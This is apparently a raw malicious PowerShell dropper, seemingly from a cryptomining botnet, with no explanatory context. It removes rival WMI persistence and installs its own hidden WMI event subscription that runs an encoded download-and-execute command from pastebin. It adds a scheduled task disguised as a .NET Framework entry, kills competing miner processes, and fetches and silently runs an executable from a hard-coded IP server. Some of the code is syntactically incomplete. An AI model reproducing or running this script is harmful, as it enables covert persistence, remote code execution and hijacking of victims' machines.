Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='_sysConsumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='_sysConsumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%_sysConsumer%'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Systems Manage Consumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Systems Manage Consumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Systems Manage Consumer%'" | Remove-WmiObject -Verbose
$current=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name -replace "((.*)\\)", ""
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Contains("SYSTEM")){
$filterName = 'wmilog4'
$consumerName = 'wmilog4'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$Arg =@{
Name=$consumerName
CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwA3AFgAUQBpAGsATAAzAFUAJwApAA=="
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
Catch {
schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\windows\.NET Framework\log4" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/QQWfHr8c'''))'" /F /ru System
$cc="http://183.102.83.247:7070/docs"
$dst="$env:temp\kthmimu.exe"
$dst1="$env:temp\config.json"
Get-Process network0*, *kthreaddi], kthreaddi, kthreaddk, sysrv012, sysrv011, sysrv010, sysrv00* -ErrorAction SilentlyContinue | Stop-Process
if (!(Get-Process kthmimu -ErrorAction SilentlyContinue)) {
(New-Object Net.WebClient).DownloadFile("$cc/config.json", "$dst1")
(New-Object Net.WebClient).DownloadFile("$cc/x.exe", "$dst")
Start-Sleep -Seconds 1
Start-Process "$dst" -windowstyle hidden